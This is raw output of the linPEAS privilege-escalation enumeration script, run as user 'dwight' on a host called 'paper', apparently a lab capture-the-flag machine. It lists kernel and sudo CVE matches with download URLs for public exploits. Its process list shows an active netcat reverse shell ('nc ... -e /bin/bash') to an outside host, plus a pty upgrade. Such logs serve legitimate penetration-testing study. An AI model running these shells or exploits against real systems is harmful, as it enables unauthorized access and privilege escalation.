linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 [1;4mLEGEND[0m:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
                                         ╚═══════════════════╝
OS: Linux version 4.18.0-348.7.1.el8_5.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 8.5.0 20210514 (Red Hat 8.5.0-4) (GCC)) #1 SMP Wed Dec 22 13:25:12 UTC 2021
User & Groups: uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
Hostname: paper
Writable folder: /tmp
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


Caching directories DONE

                                        ╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
                                        ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.18.0-348.7.1.el8_5.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 8.5.0 20210514 (Red Hat 8.5.0-4) (GCC)) #1 SMP Wed Dec 22 13:25:12 UTC 2021
lsb_release Not Found

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.29

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin
New path exported: /home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/bin

╔══════════╣ Date & uptime
Sun May 29 13:57:40 EDT 2022
 13:57:40 up  1:44,  2 users,  load average: 0.48, 0.41, 0.33

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2

╔══════════╣ Unmounted file-system?
╚ Check if you can mount unmounted devices

/dev/mapper/cl-root     /                       xfs     defaults        0 0
UUID=92708911-c24f-48e2-8b9f-bb4b24f0ca24 /boot                   ext4    defaults        1 2
/dev/mapper/cl-swap     swap                    swap    defaults        0 0

╔══════════╣ Environment
╚ Any private information inside environment variables?
LS_COLORS=rs=0:di=38;5;33:ln=38;5;51:mh=00:pi=40;38;5;11:so=38;5;13:do=38;5;5:bd=48;5;232;38;5;11:cd=48;5;232;38;5;3:or=48;5;232;38;5;9:mi=01;05;37;41:su=48;5;196;38;5;15:sg=48;5;11;38;5;16:ca=48;5;196;38;5;226:tw=48;5;10;38;5;16:ow=48;5;10;38;5;21:st=48;5;21;38;5;15:ex=38;5;40:*.tar=38;5;9:*.tgz=38;5;9:*.arc=38;5;9:*.arj=38;5;9:*.taz=38;5;9:*.lha=38;5;9:*.lz4=38;5;9:*.lzh=38;5;9:*.lzma=38;5;9:*.tlz=38;5;9:*.txz=38;5;9:*.tzo=38;5;9:*.t7z=38;5;9:*.zip=38;5;9:*.z=38;5;9:*.dz=38;5;9:*.gz=38;5;9:*.lrz=38;5;9:*.lz=38;5;9:*.lzo=38;5;9:*.xz=38;5;9:*.zst=38;5;9:*.tzst=38;5;9:*.bz2=38;5;9:*.bz=38;5;9:*.tbz=38;5;9:*.tbz2=38;5;9:*.tz=38;5;9:*.deb=38;5;9:*.rpm=38;5;9:*.jar=38;5;9:*.war=38;5;9:*.ear=38;5;9:*.sar=38;5;9:*.rar=38;5;9:*.alz=38;5;9:*.ace=38;5;9:*.zoo=38;5;9:*.cpio=38;5;9:*.7z=38;5;9:*.rz=38;5;9:*.cab=38;5;9:*.wim=38;5;9:*.swm=38;5;9:*.dwm=38;5;9:*.esd=38;5;9:*.jpg=38;5;13:*.jpeg=38;5;13:*.mjpg=38;5;13:*.mjpeg=38;5;13:*.gif=38;5;13:*.bmp=38;5;13:*.pbm=38;5;13:*.pgm=38;5;13:*.ppm=38;5;13:*.tga=38;5;13:*.xbm=38;5;13:*.xpm=38;5;13:*.tif=38;5;13:*.tiff=38;5;13:*.png=38;5;13:*.svg=38;5;13:*.svgz=38;5;13:*.mng=38;5;13:*.pcx=38;5;13:*.mov=38;5;13:*.mpg=38;5;13:*.mpeg=38;5;13:*.m2v=38;5;13:*.mkv=38;5;13:*.webm=38;5;13:*.ogm=38;5;13:*.mp4=38;5;13:*.m4v=38;5;13:*.mp4v=38;5;13:*.vob=38;5;13:*.qt=38;5;13:*.nuv=38;5;13:*.wmv=38;5;13:*.asf=38;5;13:*.rm=38;5;13:*.rmvb=38;5;13:*.flc=38;5;13:*.avi=38;5;13:*.fli=38;5;13:*.flv=38;5;13:*.gl=38;5;13:*.dl=38;5;13:*.xcf=38;5;13:*.xwd=38;5;13:*.yuv=38;5;13:*.cgm=38;5;13:*.emf=38;5;13:*.ogv=38;5;13:*.ogx=38;5;13:*.aac=38;5;45:*.au=38;5;45:*.flac=38;5;45:*.m4a=38;5;45:*.mid=38;5;45:*.midi=38;5;45:*.mka=38;5;45:*.mp3=38;5;45:*.mpc=38;5;45:*.ogg=38;5;45:*.ra=38;5;45:*.wav=38;5;45:*.oga=38;5;45:*.opus=38;5;45:*.spx=38;5;45:*.xspf=38;5;45:
LC_MEASUREMENT=pt_PT.UTF-8
SSH_CONNECTION=10.10.14.132 33870 10.10.11.143 22
LC_PAPER=pt_PT.UTF-8
LC_MONETARY=pt_PT.UTF-8
LANG=en_GB.utf8
HISTCONTROL=ignoredups
HOSTNAME=paper
OLDPWD=/home/dwight
which_declare=declare -f
XDG_SESSION_ID=119
USER=dwight
PWD=/home/dwight/.r3pek
HOME=/home/dwight
SSH_CLIENT=10.10.14.132 33870 22
XDG_DATA_DIRS=/home/dwight/.local/share/flatpak/exports/share:/var/lib/flatpak/exports/share:/usr/local/share:/usr/share
HISTFILE=/dev/null
LC_NUMERIC=pt_PT.UTF-8
SSH_TTY=/dev/pts/1
MAIL=/var/spool/mail/dwight
SHELL=/bin/bash
TERM=xterm-256color
TC_LIB_DIR=/usr/lib64/tc
SHLVL=2
LOGNAME=dwight
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1004/bus
XDG_RUNTIME_DIR=/run/user/1004
PATH=/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/sbin:/bin
HISTSIZE=0
HISTFILESIZE=0
LESSOPEN=||/usr/bin/lesspipe.sh %s
LC_TIME=pt_PT.UTF-8
BASH_FUNC_which%%=() {  ( alias;
 eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"
}
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2

╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... SELinux status:                 disabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)

                                             ╔═══════════╗
═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════
                                             ╚═══════════╝
╔══════════╣ Container related tools present
/usr/bin/podman
/usr/bin/runc
╔══════════╣ Container details
═╣ Is this a container? ........... No═╣ Any running containers? ........ No


                          ╔════════════════════════════════════════════════╗
══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════
                          ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root           1  0.0  0.3 181028  7312 ?        Ss   12:13   0:04 /usr/lib/systemd/systemd --switched-root --system --deserialize 17
root         856  0.0  0.5  89588  9432 ?        Ss   12:13   0:00 /usr/lib/systemd/systemd-journald
root         894  0.0  0.2 118644  5284 ?        Ss   12:13   0:00 /usr/lib/systemd/systemd-udevd
root         993  0.0  0.2 155800  3904 ?        S<sl 12:13   0:00 /sbin/auditd
root         995  0.0  0.0  48560  1396 ?        S<   12:13   0:00  _ /usr/sbin/sedispatch
libstor+    1023  0.0  0.1  19740  1880 ?        Ss   12:13   0:00 /usr/bin/lsmd -d
root        1025  0.0  0.3 564508  7236 ?        Ssl  12:13   0:00 /usr/libexec/udisks2/udisksd
root        1029  0.0  0.1  50260  3228 ?        Ss   12:13   0:00 /usr/sbin/smartd -n -q never
avahi       1077  0.0  0.0  85208   304 ?        S    12:13   0:00  _ avahi-daemon: chroot helper
root        1033  0.0  0.2  86204  4048 ?        Ss   12:13   0:00 /usr/bin/VGAuthService -s
root        1035  0.1  0.2 308012  5492 ?        Ssl  12:13   0:06 /usr/bin/vmtoolsd
root        1038  0.0  0.2  79116  3968 ?        Ss   12:13   0:00 /usr/lib/systemd/systemd-machined
root        1039  0.0  0.3 219104  5560 ?        Ss   12:13   0:00 /usr/sbin/sssd -i --logger=files
root        1080  0.0  0.4 228272  7688 ?        S    12:13   0:06  _ /usr/libexec/sssd/sssd_be --domain implicit_files --uid 0 --gid 0 --logger=files
root        1113  0.0  1.8 229264 34300 ?        S    12:13   0:04  _ /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
rtkit       1041  0.0  0.1 202852  2916 ?        SNsl 12:13   0:00 /usr/libexec/rtkit-daemon
  └─(Caps) 0x0000000000880004=cap_dac_read_search,cap_sys_ptrace,cap_sys_nice
chrony      1043  0.0  0.1 151156  2660 ?        S    12:13   0:00 /usr/sbin/chronyd
  └─(Caps) 0x0000000002000400=cap_net_bind_service,cap_sys_time
polkitd     1044  0.0  0.8 1953860 15448 ?       Ssl  12:13   0:02 /usr/lib/polkit-1/polkitd --no-debug
dbus        1048  0.0  0.2  84000  4636 ?        Ss   12:13   0:04 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root        1051  0.0  0.2 463028  4552 ?        Ssl  12:13   0:00 /usr/sbin/ModemManager
root        1052  0.0  0.1 125020  2920 ?        Ssl  12:13   0:00 /usr/sbin/irqbalance --foreground
root        1066  0.0  0.3 405012  6560 ?        Ssl  12:13   0:01 /usr/sbin/NetworkManager --no-daemon
root        1093  0.0  0.1  26244  2184 ?        S    12:13   0:00 /bin/bash /usr/sbin/ksmtuned
root       83746  0.0  0.0   7308   936 ?        S    13:57   0:00  _ sleep 60
root        1115  0.0  0.3 219124  5584 ?        Ss   12:13   0:00 php-fpm: master process (/etc/php-fpm.conf)
apache      1162  0.0  0.6 309592 11076 ?        S    12:13   0:01  _ php-fpm: pool www
apache      1163  0.0  1.1 319820 20512 ?        S    12:13   0:01  _ php-fpm: pool www
apache      1166  0.0  1.4 323908 26604 ?        S    12:13   0:01  _ php-fpm: pool www
apache      1167  0.0  1.5 328000 28940 ?        S    12:13   0:02  _ php-fpm: pool www
apache      1168  0.0  0.5 307528 10392 ?        S    12:13   0:01  _ php-fpm: pool www
apache      1967  0.0  1.1 319816 20348 ?        S    12:13   0:00  _ php-fpm: pool www
root        1118  0.0  0.2  94472  3892 ?        Ss   12:13   0:00 /usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa
dwight     26392  0.0  0.2 163784  4892 ?        S    12:39   0:00  |   _ sshd: dwight@pts/2
dwight     26393  0.0  0.2  25568  4928 pts/2    Ss+  12:39   0:00  |       _ -bash
dwight     82742  0.0  0.3 163784  5780 ?        S    13:53   0:00  |   _ sshd: dwight@pts/1
dwight     82743  0.0  0.3  28468  5936 pts/1    Ss   13:53   0:00  |       _ -bash
dwight     83330  0.7  0.2  15040  5364 pts/1    S+   13:57   0:00  |           _ /bin/sh ./linpeas.sh -N
dwight     86229  0.0  0.2  15040  3888 pts/1    S+   13:57   0:00  |               _ /bin/sh ./linpeas.sh -N
dwight     86233  0.0  0.2  56260  4416 pts/1    R+   13:57   0:00  |               |   _ ps fauxwww
dwight     86232  0.0  0.1  15040  2544 pts/1    S+   13:57   0:00  |               _ /bin/sh ./linpeas.sh -N
root        1125  0.6  0.9 571552 17944 ?        Ssl  12:13   0:37 /usr/libexec/platform-python -Es /usr/sbin/tuned -l -P
root        1128  0.0  0.1 101776  2020 ?        Ssl  12:13   0:00 /usr/sbin/gssproxy -D
root        1205  0.0  0.2  92624  4688 ?        Ss   12:13   0:00 /usr/lib/systemd/systemd-logind
mongod      1231  1.0  3.8 1386792 70516 ?       Sl   12:13   1:06 /usr/bin/mongod -f /etc/mongod.conf
root        1252  0.0  0.7 285276 13480 ?        Ss   12:13   0:00 /usr/sbin/httpd -DFOREGROUND
apache     80273  0.0  0.4 298324  8688 ?        S    13:40   0:00  _ /usr/sbin/httpd -DFOREGROUND
apache     80274  0.0  0.4 299696  8916 ?        S    13:40   0:00  _ /usr/sbin/httpd -DFOREGROUND
apache     80275  0.2  0.5 1946956 10788 ?       Sl   13:40   0:02  _ /usr/sbin/httpd -DFOREGROUND
apache     80360  0.2  0.5 1815680 10756 ?       Sl   13:40   0:02  _ /usr/sbin/httpd -DFOREGROUND
apache     80361  0.2  0.6 1815680 12788 ?       Sl   13:40   0:02  _ /usr/sbin/httpd -DFOREGROUND
apache     80492  0.2  0.5 1815680 10780 ?       Sl   13:40   0:02  _ /usr/sbin/httpd -DFOREGROUND
root        1260  0.0  0.4 211616  7800 ?        Ssl  12:13   0:00 /usr/sbin/rsyslogd -n
root        1277  0.0  0.1  36952  2764 ?        Ss   12:13   0:00 /usr/sbin/crond -n
root        1288  0.0  0.1 126088  3428 ?        S    12:13   0:00  _ /usr/sbin/CROND -n
dwight      1792  0.0  0.1  12724  2360 ?        Ss   12:13   0:00      _ /bin/sh -c /home/dwight/bot_restart.sh >> /home/dwight/hubot/.hubot.log 2>&1
dwight      1796  0.0  0.1  12724  2488 ?        S    12:13   0:00          _ /bin/bash /home/dwight/bot_restart.sh
dwight      2492  0.0  0.1  12724  2420 ?        S    12:14   0:00              _ bash /home/dwight/hubot/start_bot.sh
dwight      2494  0.0  0.8 588400 14860 ?        Sl   12:14   0:01              |   _ node /home/dwight/hubot/node_modules/coffeescript/bin/coffee /home/dwight/hubot/node_modules/.bin/hubot -a rocketchat
dwight      2534  0.0  0.1  12724  2412 ?        S    12:14   0:00              _ bash /home/dwight/hubot/start_bot.sh
dwight      2536  0.3  1.8 625036 33080 ?        Sl   12:14   0:19              |   _ node /home/dwight/hubot/node_modules/coffeescript/bin/coffee /home/dwight/hubot/node_modules/.bin/hubot -a rocketchat
dwight      3358  0.0  0.1  32508  3100 ?        S    12:31   0:00              |       _ nc 10.10.14.94 5555
dwight      3523  0.0  0.1  32508  3168 ?        S    12:35   0:00              |       _ nc 10.10.14.94 5555 -e /bin/bash
dwight      3524  0.0  0.1  12724  2788 ?        S    12:35   0:00              |       |   _ /bin/bash
dwight     26492  0.0  0.4  45392  8092 ?        S    12:40   0:00              |       |       _ python3 -c import pty;pty.spawn("/bin/bash")
dwight     26493  0.0  0.2  25460  5016 pts/3    Ss+  12:40   0:00              |       |           _ /bin/bash
dwight      3788  0.0  0.2  32108  4580 ?        S    12:35   0:00              |       _ python3
dwight      8098  0.0  0.1  12724  2776 ?        S    12:37   0:00              _ bash /home/dwight/hubot/start_bot.sh
dwight      8100  0.1  1.7 623624 32640 ?        Sl   12:37   0:08              |   _ node /home/dwight/hubot/node_modules/coffeescript/bin/coffee /home/dwight/hubot/node_modules/.bin/hubot -a rocketchat
dwight     83738  0.0  0.0   7308   896 ?        S    13:57   0:00              _ sleep 20s
root        1279  0.0  0.1  44004  2136 ?        Ss   12:13   0:00 /usr/sbin/atd -f
root        1289  0.0  0.0  13656  1536 tty1     Ss+  12:13   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
mysql       1353  0.2  3.8 1776648 70048 ?       Ssl  12:13   0:14 /usr/libexec/mysqld --basedir=/usr
  └─(Caps) 0x0000000000800000=cap_sys_nice
dwight      1356  0.0  0.2  89488  5268 ?        Ss   12:13   0:00 /usr/lib/systemd/systemd --user
dwight      1362  0.0  0.0 168584   524 ?        S    12:13   0:00  _ (sd-pam)
dwight      1791  0.0  0.1 298156  3028 ?        Ssl  12:13   0:00  _ /usr/bin/pulseaudio --daemonize=no --log-target=journal
dwight      2275  0.0  0.1  76488  2580 ?        Ss   12:13   0:00  _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
dwight      2591  0.0  0.2 313016  4452 ?        Ssl  12:15   0:00  _ /usr/libexec/gvfsd
dwight      2596  0.0  0.2 449608  4472 ?        Sl   12:15   0:00  _ /usr/libexec/gvfsd-fuse /run/user/1004/gvfs -f -o big_writes
rocketc+    2217  2.0 24.6 2640484 452320 ?      Ssl  12:13   2:09 /usr/local/bin/node /opt/Rocket.Chat/main.js
dnsmasq     2247  0.0  0.0  73328   832 ?        S    12:13   0:00 /usr/sbin/dnsmasq --conf-file=/var/lib/libvirt/dnsmasq/default.conf --leasefile-ro --dhcp-script=/usr/libexec/libvirt_leaseshelper
  └─(Caps) 0x0000000000003400=cap_net_bind_service,cap_net_admin,cap_net_raw
root        2248  0.0  0.0  73300   224 ?        S    12:13   0:00  _ /usr/sbin/dnsmasq --conf-file=/var/lib/libvirt/dnsmasq/default.conf --leasefile-ro --dhcp-script=/usr/libexec/libvirt_leaseshelper
dwight     11446  0.0  0.0 169040   240 ?        Ss   12:38   0:00 gpg-agent --homedir /home/dwight/.gnupg --use-standard-socket --daemon
root       27164  0.0  2.5 627052 46832 ?        Ssl  12:55   0:02 /usr/libexec/packagekitd
root       27461  0.0  0.1  36020  2708 ?        Ss   13:01   0:00 /usr/sbin/anacron -s
root       81245  0.0  0.5 334324 10940 ?        Ssl  13:46   0:00 /usr/libexec/accounts-daemon

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND     PID   TID TASKCMD             USER   FD      TYPE             DEVICE SIZE/OFF       NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
@reboot /home/dwight/bot_restart.sh >> /home/dwight/hubot/.hubot.log 2>&1
incrontab Not Found
-rw-r--r--. 1 root root   0 Nov  8  2019 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jan 12  2021 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x.   2 root root   39 Nov  8  2019 .
drwxr-xr-x. 145 root root 8192 May 29 13:56 ..
-rw-r--r--.   1 root root  128 Nov  8  2019 0hourly
-rw-r--r--.   1 root root  108 Aug  9  2021 raid-check

/etc/cron.daily:
total 16
drwxr-xr-x.   2 root root   23 May 15  2020 .
drwxr-xr-x. 145 root root 8192 May 29 13:56 ..
-rwxr-xr-x.   1 root root  189 Jan  4  2018 logrotate

/etc/cron.hourly:
total 16
drwxr-xr-x.   2 root root   22 Jan 14 04:49 .
drwxr-xr-x. 145 root root 8192 May 29 13:56 ..
-rwxr-xr-x.   1 root root  575 Nov  8  2019 0anacron

/etc/cron.monthly:
total 12
drwxr-xr-x.   2 root root    6 Jan 12  2021 .
drwxr-xr-x. 145 root root 8192 May 29 13:56 ..

/etc/cron.weekly:
total 12
drwxr-xr-x.   2 root root    6 Jan 12  2021 .
drwxr-xr-x. 145 root root 8192 May 29 13:56 ..

/var/spool/anacron:
total 12
drwxr-xr-x. 2 root root 63 Nov  8  2019 .
drwxr-xr-x. 9 root root 97 Jun 22  2021 ..
-rw-------. 1 root root  9 May 29 13:40 cron.daily
-rw-------. 1 root root  9 Jan 14 07:49 cron.monthly
-rw-------. 1 root root  9 Jan 14 07:29 cron.weekly
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root






SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
RANDOM_DELAY=45
START_HOURS_RANGE=3-22

1	5	cron.daily		nice run-parts /etc/cron.daily
7	25	cron.weekly		nice run-parts /etc/cron.weekly
@monthly 45	cron.monthly		nice run-parts /etc/cron.monthly

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/sysinit.target.wants/iscsi.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                         LEFT       LAST                         PASSED       UNIT                         ACTIVATES
Sun 2022-05-29 14:12:01 EDT  13min left Sun 2022-05-29 12:59:35 EDT  59min ago    dnf-makecache.timer          dnf-makecache.service
Mon 2022-05-30 00:00:00 EDT  10h left   n/a                          n/a          unbound-anchor.timer         unbound-anchor.service
Mon 2022-05-30 12:28:20 EDT  22h left   Sun 2022-05-29 12:28:20 EDT  1h 30min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/avahi-daemon.socket is calling this writable listener: /run/avahi-daemon/socket

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/httpd/run/cgisock.1252
/home/dwight/hubot/127.0.0.1:8000
  └─(Read Write)
/home/dwight/hubot/127.0.0.1:8080
  └─(Read Write)
/org/kernel/linux/storage/multipathd
/run/.heim_org.h5l.kcm-socket
  └─(Read Write)
/run/avahi-daemon/socket
  └─(Read Write)
/run/dbus/system_bus_socket
  └─(Read Write)
/run/gssproxy.sock
  └─(Read Write)
/run/libvirt/libvirt-admin-sock
/run/libvirt/libvirt-sock
  └─(Read Write)
/run/libvirt/libvirt-sock-ro
  └─(Read Write)
/run/libvirt/virtlockd-sock
/run/libvirt/virtlogd-sock
/run/lsm/ipc/sim
  └─(Read Write)
/run/lsm/ipc/simc
  └─(Read Write)
/run/lvm/lvmpolld.socket
/run/php-fpm/www.sock
/run/systemd/cgroups-agent
/run/systemd/coredump
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/udev/control
/run/user/1004/bus
  └─(Read Write)
/run/user/1004/gnupg/S.gpg-agent
  └─(Read Write)
/run/user/1004/gnupg/S.gpg-agent.browser
  └─(Read Write)
/run/user/1004/gnupg/S.gpg-agent.extra
  └─(Read Write)
/run/user/1004/gnupg/S.gpg-agent.ssh
  └─(Read Write)
/run/user/1004/pipewire-0
  └─(Read Write)
/run/user/1004/pulse/native
  └─(Read Write)
/run/user/1004/systemd/notify
  └─(Read Write)
/run/user/1004/systemd/private
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/tmp/.esd-1004/socket
  └─(Read Write)
/tmp/mongodb-27017.sock
/var/cache/PackageKit/8/metadata/BaseOS-8-x86_64/gpgdir/S.gpg-agent
/var/cache/PackageKit/8/metadata/BaseOS-8-x86_64/gpgdir/S.gpg-agent.browser
/var/cache/PackageKit/8/metadata/BaseOS-8-x86_64/gpgdir/S.gpg-agent.extra
/var/cache/PackageKit/8/metadata/BaseOS-8-x86_64/gpgdir/S.gpg-agent.ssh
/var/cache/PackageKit/8/metadata/extras-8-x86_64/gpgdir/S.gpg-agent
/var/cache/PackageKit/8/metadata/extras-8-x86_64/gpgdir/S.gpg-agent.browser
/var/cache/PackageKit/8/metadata/extras-8-x86_64/gpgdir/S.gpg-agent.extra
/var/cache/PackageKit/8/metadata/extras-8-x86_64/gpgdir/S.gpg-agent.ssh
/var/lib/gssproxy/default.sock
  └─(Read Write)
/var/lib/mysql/mysql.sock
  └─(Read Write)
/var/lib/mysql/mysqlx.sock
  └─(Read Write)
/var/lib/sss/pipes/nss
  └─(Read Write)
/var/lib/sss/pipes/private/sbus-dp_implicit_files.1080
/var/lib/sss/pipes/private/sbus-monitor
/var/run/.heim_org.h5l.kcm-socket
  └─(Read Write)
/var/run/lsm/ipc/sim
  └─(Read Write)
/var/run/lsm/ipc/simc
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)

